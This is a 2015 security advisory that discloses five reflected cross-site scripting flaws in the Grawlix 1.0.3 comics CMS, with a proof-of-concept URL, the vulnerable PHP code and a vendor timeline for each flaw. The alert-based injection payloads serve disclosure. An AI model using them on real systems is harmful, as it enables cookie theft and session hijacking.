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Grawlix 1.0.3 Cross Site Scripting

Posted on 25 December 2015

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Grawlix 1.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://www.getgrawlix.com/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3 and possibly prior versions, it contains multiple reflected XSS vulnerabilities. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection. 3. Details XSS 1 When searching for a book in the admin area, the keyword parameter is echoed unencoded inside the value attribute of an input tag, leading to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/book.view.php?keyword=" autofocus onfocus="alert(1) Code: _admin/book.view.php <input type="search" name="keyword" id="keyword" placeholder="Search for" value="$keyword"/> XSS 2 The slot.label-set.ajax.php script echoes all GET parameters unencoded, leading to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/slot.label-set.ajax.php?x=<script>alert(1)</script> Code: _admin/slot.label-set.ajax.php echo '<pre>$_GET|';print_r($_GET);echo '|</pre>'; XSS 3 The edit_id parameter of the site.nav-edit.ajax.php is vulnerable to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/site.nav-edit.ajax.php?edit_id="><script>alert(1)</script> Code: _admin/site.nav-edit.ajax.php $edit_id = $_GET['edit_id']; [...] $modal->value($edit_id); _admin/lib/GrlxForm.php $this->value ? $value = ' value="'.$this->value.'"' : null; XSS 4 When viewing the book overview, the start_sort_order parameter is vulnerable to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/book.view.php?delete_page_id=1&start_sort_order=" onmouseover="alert(1) Code: _admin/book.view.php $delete_link->query("delete_page_id=$val[id]&start_sort_order=$start_sort_order"); XSS 5 (limited) In two scripts, the page_id value is put into a hidden input element without encoding quotes. It may be possible to execute JavaScript via a style element in older browsers. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/sttc.xml-edit.php?msg=created&page_id=" style="STYLE http://localhost/grawlix-1.0.3/_admin/book.page-edit.php?page_id=" style="STYLE 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Grawlix-103-XSS-129.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany

 

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